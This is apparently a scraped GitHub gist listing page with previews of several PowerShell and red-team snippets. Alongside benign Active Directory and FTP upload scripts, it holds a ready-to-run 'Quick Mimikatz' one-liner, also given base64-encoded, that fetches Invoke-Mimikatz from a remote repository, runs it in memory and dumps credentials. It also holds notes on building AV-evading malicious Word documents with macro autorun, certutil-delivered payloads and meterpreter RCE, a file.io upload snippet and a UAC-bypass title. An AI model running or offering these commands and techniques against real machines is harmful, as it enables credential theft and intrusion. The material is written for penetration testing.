Skip to content

Instantly share code, notes, and snippets.

View majid-derkaoui's full-sized avatar

snake majid-derkaoui

44 followers · 453 following
View GitHub Profile
@rollwagen
rollwagen / powershell_file_io_upload.ps1
Last active May 11, 2023 23:29
powershell snippets #powershell #upload
$sourceFilePath = "/etc/apt/archive"
$siteAddress = "https://file.io/?expires=1w"
$webClient = New-Object System.Net.WebClient
$response
try {
$response = $webClient.UploadFile($siteAddress,$sourceFilePath)
} catch {
Write-Host $_
}
[System.Text.Encoding]::ASCII.GetString($response)
@mgeeky
mgeeky / muti-stage-1.md
Last active December 11, 2025 14:08
Multi-Stage Malicious Document creation process (ala APT)

Multi-Stage Penetration-Testing / Red Teaming Malicious Word document creation process

The below paper documents the process of creating a multi-stage IPS/AV transparent malicious document for purposes of Red Teaming / Penetration-Testing assignments.

The resulted document will be:

  • using OLE event autorun method
  • removing it's pretext shapes
  • Obtaining commands to be executed from document's Author property and passing them to StdIn of Powershell.exe process
  • Leveraging certutil technique to receive Base64 encoded malicious HTA document
  • Having Base64 encoded Powershell command in that Author property
@cactaceae21
cactaceae21 / AD_Computers.ps1
Last active February 3, 2024 02:03
Powershell #powershell
#Get OS of all domain joined computers and group by OS with count
# 1.
Get-ADComputer -Filter * -Properties OperatingSystem | Sort-Object -Property OperatingSystem | Group-Object -Property OperatingSystem -NoElement | ft -AutoSize
# 2.
$ADComputers = @()
$ADComputers = Get-ADComputer -Filter * -Properties OperatingSystem,lastLogonTimestamp
$ADComputers | Sort-Object -Property OperatingSystem | Group-Object -Property OperatingSystem -NoElement | ft -AutoSize
##Create date object for queries below
@simply-coded
simply-coded / RunAsAdminNoUAC.md
Last active January 6, 2021 16:07
Will run the current VBScript as an administrator without a UAC prompt after the initial setup run.
@mgeeky
mgeeky / Various-Macro-Based-RCEs.md
Last active March 22, 2026 03:50
Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.

This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the below examples had been generated for using as a remote address: 192.168.56.101.

List:

  1. Page substiution macro for luring user to click Enable Content
  2. The Unicorn Powershell based payload
@gfoss
gfoss / Quick-Mimikatz
Last active December 5, 2025 02:46
Quick Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz [local]
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;
#encoded-mimikatz [local]
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGUAbQBwAGkAcgBlAC8AcwBlAHIAdgBlAHIALwBkAGEAdABhAC8AbQBvAGQAdQBsAGUAXwBzAG8AdQByAGMAZQAvAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAvAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC4AcABzADEAIgApADsAIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0AQwBvAG0AbQBhAG4AZAAgAHAAcgBpAHYAaQBsAGUAZwBl
@dkittell
dkittell / FTP-UploadDirectory.ps1
Created November 24, 2015 18:13
PowerShell – FTP Upload Directory With Sub-Directories
clear
# FTP Server Variables
$FTPHost = 'ftp://192.168.1.1/html/'
$FTPUser = 'user'
$FTPPass = 'password'
#Directory where to find pictures to upload
$UploadFolder = "C:\Temp\"